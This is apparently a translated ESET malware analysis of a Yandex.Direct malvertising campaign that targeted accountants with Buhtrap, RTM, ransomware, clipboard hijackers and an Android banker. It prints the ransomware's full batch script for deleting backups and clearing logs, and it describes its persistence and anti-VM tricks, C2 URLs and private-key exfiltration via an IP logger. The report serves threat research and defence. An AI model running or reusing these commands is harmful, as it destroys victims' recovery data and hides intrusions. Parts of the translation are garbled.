Untuk menargetkan akuntan dalam serangan dunia maya, Anda dapat menggunakan dokumen kerja yang mereka cari secara online. Hal ini kira-kira dilakukan oleh kelompok cyber selama beberapa bulan terakhir, dengan mendistribusikan backdoor yang diketahui. и , serta enkripsi dan perangkat lunak untuk mencuri mata uang kripto. Sebagian besar target berlokasi di Rusia. Serangan itu dilakukan dengan memasang iklan jahat di Yandex.Direct. Calon korban diarahkan ke situs web tempat mereka diminta mengunduh file berbahaya yang disamarkan sebagai templat dokumen. Yandex menghapus iklan berbahaya tersebut setelah peringatan kami.
Kode sumber Buhtrap telah bocor secara online di masa lalu sehingga siapapun dapat menggunakannya. Kami tidak memiliki informasi mengenai ketersediaan kode RTM.
Dalam postingan ini kami akan memberi tahu Anda bagaimana penyerang mendistribusikan malware menggunakan Yandex.Direct dan menghostingnya di GitHub. Postingan ini akan diakhiri dengan analisis teknis malware tersebut.
Buhtrap dan RTM kembali berbisnis
Mekanisme penyebaran dan korban
Berbagai muatan yang dikirimkan kepada korban memiliki mekanisme penyebaran yang sama. Semua file berbahaya yang dibuat oleh penyerang ditempatkan di dua repositori GitHub yang berbeda.
Biasanya, repositori berisi satu file berbahaya yang dapat diunduh, yang sering berubah. Karena GitHub memungkinkan Anda melihat riwayat perubahan pada repositori, kita dapat melihat malware apa yang didistribusikan selama periode tertentu. Untuk meyakinkan korban agar mengunduh file berbahaya tersebut, situs web blanki-shabloni24[.]ru, yang ditunjukkan pada gambar di atas, digunakan.
Desain situs dan semua nama file berbahaya mengikuti satu konsep - formulir, templat, kontrak, sampel, dll. Mengingat perangkat lunak Buhtrap dan RTM telah digunakan dalam serangan terhadap akuntan di masa lalu, kami berasumsi bahwa strategi dalam kampanye baru adalah sama. Satu-satunya pertanyaan adalah bagaimana korban bisa sampai ke situs penyerang.
Infeksi
Setidaknya beberapa calon korban yang mengunjungi situs ini tertarik dengan iklan jahat. Di bawah ini adalah contoh URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Seperti yang Anda lihat dari tautannya, spanduk tersebut dipasang di forum akuntansi yang sah bb.f2[.]kz. Penting untuk dicatat bahwa spanduk muncul di situs yang berbeda, semuanya memiliki id kampanye yang sama (blanki_rsya), dan sebagian besar terkait dengan layanan akuntansi atau bantuan hukum. URL tersebut menunjukkan bahwa calon korban menggunakan permintaan “unduh formulir faktur”, yang mendukung hipotesis kami tentang serangan yang ditargetkan. Di bawah ini adalah situs tempat spanduk muncul dan permintaan pencarian terkait.
- unduh formulir faktur – bb.f2[.]kz
- contoh perjanjian - Ipopen[.]ru
- contoh keluhan aplikasi - 77metrov[.]ru
- formulir perjanjian - blank-dogovor-kupli-prodazhi[.]ru
- contoh petisi pengadilan - zen.yandex[.]ru
- contoh pengaduan - yurday[.]ru
- contoh formulir kontrak – Regforum[.]ru
- formulir kontrak – assistentus[.]ru
- contoh perjanjian apartemen – napravah[.]com
- contoh kontrak hukum - avito[.]ru
Situs blanki-shabloni24[.]ru mungkin telah dikonfigurasi untuk lulus penilaian visual sederhana. Biasanya, iklan yang mengarah ke situs yang terlihat profesional dengan tautan ke GitHub sepertinya bukan sesuatu yang buruk. Selain itu, penyerang mengunggah file berbahaya ke repositori hanya untuk jangka waktu terbatas, kemungkinan besar selama kampanye. Biasanya, repositori GitHub berisi arsip zip kosong atau file EXE kosong. Dengan demikian, penyerang dapat mendistribusikan iklan melalui Yandex.Direct di situs yang kemungkinan besar dikunjungi oleh akuntan yang datang sebagai tanggapan atas permintaan pencarian tertentu.
Selanjutnya, mari kita lihat berbagai muatan yang didistribusikan dengan cara ini.
Analisis Muatan
Kronologi distribusi
Kampanye jahat ini dimulai pada akhir Oktober 2018 dan aktif pada saat artikel ini ditulis. Karena seluruh repositori tersedia untuk umum di GitHub, kami menyusun garis waktu distribusi enam keluarga malware yang berbeda secara akurat (lihat gambar di bawah). Kami telah menambahkan baris yang menunjukkan kapan link banner ditemukan, yang diukur dengan telemetri ESET, untuk dibandingkan dengan riwayat git. Seperti yang Anda lihat, ini berkorelasi baik dengan ketersediaan payload di GitHub. Perbedaan pada akhir bulan Februari dapat dijelaskan oleh fakta bahwa kami tidak memiliki bagian dari riwayat perubahan karena repositori telah dihapus dari GitHub sebelum kami bisa mendapatkannya secara penuh.
Gambar 1. Kronologi penyebaran malware.
Sertifikat Penandatanganan Kode
Kampanye ini menggunakan banyak sertifikat. Beberapa diantaranya ditandatangani oleh lebih dari satu keluarga malware, yang selanjutnya menunjukkan bahwa sampel yang berbeda berasal dari kampanye yang sama. Meskipun tersedia kunci privat, operator tidak menandatangani biner secara sistematis dan tidak menggunakan kunci untuk semua sampel. Pada akhir Februari 2019, penyerang mulai membuat tanda tangan yang tidak valid menggunakan sertifikat milik Google yang kunci pribadinya tidak mereka miliki.
Semua sertifikat yang terlibat dalam kampanye dan keluarga malware yang ditandatangani tercantum dalam tabel di bawah.
Kami juga telah menggunakan sertifikat penandatanganan kode ini untuk menjalin hubungan dengan keluarga malware lainnya. Untuk sebagian besar sertifikat, kami tidak menemukan sampel yang tidak didistribusikan melalui repositori GitHub. Namun, sertifikat TOV “MARIYA” digunakan untuk menandatangani malware milik botnet , adware dan penambang. Kecil kemungkinan malware ini terkait dengan kampanye ini. Kemungkinan besar, sertifikat tersebut dibeli di darknet.
Win32/Filecoder.Buhtrap
Komponen pertama yang menarik perhatian kami adalah Win32/Filecoder.Buhtrap yang baru ditemukan. Ini adalah file biner Delphi yang terkadang dikemas. Distribusi terbanyak terjadi pada bulan Februari–Maret 2019. Ia berperilaku sebagaimana layaknya program ransomware - ia mencari drive lokal dan folder jaringan dan mengenkripsi file yang terdeteksi. Tidak memerlukan koneksi Internet untuk dikompromikan karena tidak menghubungi server untuk mengirim kunci enkripsi. Sebaliknya, ia menambahkan “token” di akhir pesan tebusan, dan menyarankan penggunaan email atau Bitmessage untuk menghubungi operator.
Untuk mengenkripsi sebanyak mungkin sumber daya sensitif, Filecoder.Buhtrap menjalankan thread yang dirancang untuk mematikan perangkat lunak utama yang mungkin memiliki penangan file terbuka yang berisi informasi berharga yang dapat mengganggu enkripsi. Proses targetnya sebagian besar adalah sistem manajemen basis data (DBMS). Selain itu, Filecoder.Buhtrap menghapus file log dan cadangan untuk mempersulit pemulihan data. Untuk melakukannya, jalankan skrip batch di bawah ini.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap menggunakan layanan IP Logger online sah yang dirancang untuk mengumpulkan informasi tentang pengunjung situs web. Hal ini dimaksudkan untuk melacak korban ransomware, yang merupakan tanggung jawab baris perintah:
mshta.exe "javascript:document.write('');"
File untuk enkripsi dipilih jika tidak cocok dengan tiga daftar pengecualian. Pertama, file dengan ekstensi berikut tidak dienkripsi: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys dan .kelelawar. Kedua, semua file yang path lengkapnya berisi string direktori dari daftar di bawah ini dikecualikan.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Ketiga, nama file tertentu juga dikecualikan dari enkripsi, di antaranya nama file pesan tebusan. Daftarnya disajikan di bawah ini. Tentu saja, semua pengecualian ini dimaksudkan untuk menjaga alat berat tetap berjalan, namun dengan kelayakan jalan yang minimal.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Skema enkripsi file
Setelah dijalankan, malware menghasilkan pasangan kunci RSA 512-bit. Eksponen privat (d) dan modulus (n) kemudian dienkripsi dengan kunci publik 2048-bit yang dikodekan secara keras (eksponen publik dan modulus), dikemas dengan zlib, dan dikodekan base64. Kode yang bertanggung jawab untuk ini ditunjukkan pada Gambar 2.
Gambar 2. Hasil dekompilasi Hex-Rays pada proses pembangkitan pasangan kunci RSA 512-bit.
Di bawah ini adalah contoh teks biasa dengan kunci pribadi yang dihasilkan, yaitu token yang dilampirkan pada pesan tebusan.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Kunci publik penyerang diberikan di bawah ini.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
File-file tersebut dienkripsi menggunakan AES-128-CBC dengan kunci 256-bit. Untuk setiap file terenkripsi, kunci baru dan vektor inisialisasi baru dihasilkan. Informasi kunci ditambahkan ke akhir file terenkripsi. Mari pertimbangkan format file terenkripsi.
File terenkripsi memiliki header berikut:
Data file sumber dengan penambahan nilai ajaib VEGA dienkripsi ke 0x5000 byte pertama. Semua informasi dekripsi dilampirkan ke file dengan struktur berikut:
- Penanda ukuran file berisi tanda yang menunjukkan apakah file berukuran lebih besar dari 0x5000 byte
— Gumpalan kunci AES = ZlibCompress(RSAEncrypt(kunci AES + IV, kunci publik dari pasangan kunci RSA yang dihasilkan))
- Gumpalan kunci RSA = ZlibCompress(RSAEncrypt(kunci pribadi RSA yang dihasilkan, kunci publik RSA yang dikodekan secara keras))
Win32/ClipBanker
Win32/ClipBanker adalah komponen yang didistribusikan secara berkala dari akhir Oktober hingga awal Desember 2018. Perannya adalah memantau isi clipboard, mencari alamat dompet mata uang kripto. Setelah menentukan alamat dompet target, ClipBanker menggantinya dengan alamat yang diyakini milik operator. Sampel yang kami periksa tidak dikemas atau dikaburkan. Satu-satunya mekanisme yang digunakan untuk menutupi perilaku adalah enkripsi string. Alamat dompet operator dienkripsi menggunakan RC4. Cryptocurrency target adalah Bitcoin, Bitcoin cash, Dogecoin, Ethereum, dan Ripple.
Selama periode malware menyebar ke dompet Bitcoin penyerang, sejumlah kecil malware telah dikirim ke VTS, sehingga menimbulkan keraguan terhadap keberhasilan kampanye tersebut. Selain itu, tidak ada bukti yang menunjukkan bahwa transaksi ini terkait dengan ClipBanker sama sekali.
Win32/RTM
Komponen Win32/RTM didistribusikan selama beberapa hari pada awal Maret 2019. RTM adalah bankir Trojan yang ditulis dalam Delphi, ditujukan untuk sistem perbankan jarak jauh. Pada tahun 2017, peneliti ESET menerbitkan tentang program ini, uraiannya masih relevan. Pada Januari 2019, Palo Alto Networks juga dirilis .
Pemuat Buhtrap
Untuk beberapa waktu, pengunduh tersedia di GitHub yang tidak mirip dengan alat Buhtrap sebelumnya. Dia menoleh ke https://94.100.18[.]67/RSS.php?<some_id> untuk mendapatkan tahap berikutnya dan memuatnya langsung ke memori. Kita dapat membedakan dua perilaku kode tahap kedua. Di URL pertama, RSS.php meneruskan pintu belakang Buhtrap secara langsung - pintu belakang ini sangat mirip dengan yang tersedia setelah kode sumber bocor.
Menariknya, kami melihat beberapa kampanye dengan pintu belakang Buhtrap, dan diduga dijalankan oleh operator yang berbeda. Dalam hal ini, perbedaan utamanya adalah backdoor dimuat langsung ke memori dan tidak menggunakan skema biasa dengan proses penerapan DLL yang kita bicarakan. . Selain itu, operator mengubah kunci RC4 yang digunakan untuk mengenkripsi lalu lintas jaringan ke server C&C. Di sebagian besar kampanye yang kami lihat, operator tidak repot-repot mengubah kunci ini.
Perilaku kedua yang lebih kompleks adalah URL RSS.php diteruskan ke pemuat lain. Ini menerapkan beberapa kebingungan, seperti membangun kembali tabel impor dinamis. Tujuan bootloader adalah untuk menghubungi server C&C [.]com/api/F27F84EDA4D13B15/2, kirim log dan tunggu tanggapan. Ini memproses respons sebagai blob, memuatnya ke dalam memori dan mengeksekusinya. Payload yang kami lihat saat menjalankan loader ini adalah backdoor Buhtrap yang sama, tetapi mungkin ada komponen lain.
Android/Spy.Bankir
Menariknya, komponen untuk Android juga ditemukan di repositori GitHub. Dia berada di cabang utama hanya satu hari - 1 November 2018. Selain diposting di GitHub, telemetri ESET tidak menemukan bukti penyebaran malware ini.
Komponen dihosting sebagai Paket Aplikasi Android (APK). Ini sangat dikaburkan. Perilaku jahat disembunyikan dalam JAR terenkripsi yang terletak di APK. Itu dienkripsi dengan RC4 menggunakan kunci ini:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Kunci dan algoritma yang sama digunakan untuk mengenkripsi string. JAR terletak di APK_ROOT + image/files. 4 byte pertama file berisi panjang JAR terenkripsi, yang dimulai segera setelah bidang panjang.
Setelah mendekripsi file tersebut, kami menemukan bahwa itu adalah Anubis - sebelumnya bankir untuk Android. Malware ini memiliki beberapa fitur berikut:
- rekaman dari mikrofon
- mengambil tangkapan layar
- mendapatkan koordinat GPS
- keylogger
- enkripsi data perangkat dan permintaan tebusan
- mengirim spam
Menariknya, bankir tersebut menggunakan Twitter sebagai saluran komunikasi cadangan untuk mendapatkan server C&C lain. Sampel yang kami analisa menggunakan akun @JonesTrader, namun pada saat analisa sudah diblokir.
Bankir berisi daftar aplikasi target pada perangkat Android. Daftar ini lebih panjang dari daftar yang diperoleh dalam studi Sophos. Daftar tersebut mencakup banyak aplikasi perbankan, program belanja online seperti Amazon dan eBay, dan layanan mata uang kripto.
MSIL/ClipBanker.IH
Komponen terakhir yang didistribusikan sebagai bagian dari kampanye ini adalah .NET Windows yang dapat dieksekusi, yang muncul pada bulan Maret 2019. Sebagian besar versi yang dipelajari dikemas dengan ConfuserEx v1.0.0. Seperti ClipBanker, komponen ini menggunakan clipboard. Tujuannya adalah berbagai macam cryptocurrency, serta penawaran di Steam. Selain itu, dia menggunakan layanan IP Logger untuk mencuri kunci WIF pribadi Bitcoin.
Mekanisme Perlindungan
Selain manfaat yang diberikan ConfuserEx dalam mencegah debugging, dumping, dan tampering, komponen tersebut mencakup kemampuan untuk mendeteksi produk antivirus dan mesin virtual.
Untuk memverifikasi bahwa ini berjalan di mesin virtual, malware menggunakan baris perintah WMI (WMIC) bawaan Windows untuk meminta informasi BIOS, yaitu:
wmic bios
Kemudian program mem-parsing output perintah dan mencari kata kunci: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Untuk mendeteksi produk antivirus, malware mengirimkan permintaan Windows Management Instrumentation (WMI) ke Pusat Keamanan Windows menggunakan ManagementObjectSearcher API seperti yang ditunjukkan di bawah ini. Setelah decoding dari base64, panggilannya terlihat seperti ini:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Gambar 3. Proses identifikasi produk antivirus.
Selain itu, malware memeriksa apakah , alat untuk melindungi dari serangan clipboard dan, jika dijalankan, menangguhkan semua thread dalam proses tersebut, sehingga menonaktifkan perlindungan.
Kegigihan
Versi malware yang kami pelajari akan menyalin dirinya sendiri %APPDATA%googleupdater.exe dan menyetel atribut "tersembunyi" untuk direktori google. Lalu dia mengubah nilainya SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell di registri Windows dan menambahkan jalurnya updater.exe. Dengan cara ini, malware akan dieksekusi setiap kali pengguna login.
Perilaku jahat
Seperti ClipBanker, malware memantau konten clipboard dan mencari alamat dompet mata uang kripto, dan ketika ditemukan, menggantinya dengan salah satu alamat operator. Di bawah ini adalah daftar alamat target berdasarkan apa yang ditemukan dalam kode.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Untuk setiap jenis alamat ada ekspresi reguler yang sesuai. Nilai STEAM_URL digunakan untuk menyerang sistem Steam, seperti terlihat dari ekspresi reguler yang digunakan untuk mendefinisikan di buffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Saluran eksfiltrasi
Selain mengganti alamat di buffer, malware ini juga menargetkan kunci WIF pribadi dari dompet Bitcoin, Bitcoin Core, dan Electrum Bitcoin. Program ini menggunakan plogger.org sebagai saluran eksfiltrasi untuk mendapatkan kunci pribadi WIF. Untuk melakukan hal ini, operator menambahkan data kunci pribadi ke header HTTP Agen-Pengguna, seperti yang ditunjukkan di bawah ini.
Gambar 4. Konsol IP Logger dengan data keluaran.
Operator tidak menggunakan iplogger.org untuk mengeksfiltrasi dompet. Mereka mungkin menggunakan metode berbeda karena batasan 255 karakter di lapangan User-Agentditampilkan di antarmuka web IP Logger. Dalam sampel yang kami pelajari, server keluaran lainnya disimpan dalam variabel lingkungan DiscordWebHook. Anehnya, variabel lingkungan ini tidak ditetapkan di mana pun dalam kode. Hal ini menunjukkan bahwa malware tersebut masih dalam pengembangan dan variabelnya ditugaskan ke mesin uji operator.
Ada tanda lain bahwa program ini sedang dalam pengembangan. File biner mencakup dua URL iplogger.org, dan keduanya ditanyakan ketika data dieksfiltrasi. Dalam permintaan ke salah satu URL ini, nilai di bidang Referer diawali dengan “DEV /”. Kami juga menemukan versi yang tidak dikemas menggunakan ConfuserEx, penerima URL ini bernama DevFeedbackUrl. Berdasarkan nama variabel lingkungan, kami yakin bahwa operator berencana menggunakan layanan resmi Discord dan sistem intersepsi webnya untuk mencuri dompet mata uang kripto.
Kesimpulan
Kampanye ini merupakan contoh penggunaan layanan periklanan yang sah dalam serangan cyber. Skema ini menargetkan organisasi-organisasi Rusia, namun kami tidak akan terkejut melihat serangan semacam itu menggunakan layanan non-Rusia. Untuk menghindari kompromi, pengguna harus yakin dengan reputasi sumber perangkat lunak yang mereka unduh.
Daftar lengkap indikator kompromi dan atribut MITRE ATT&CK tersedia di .
Sumber: www.habr.com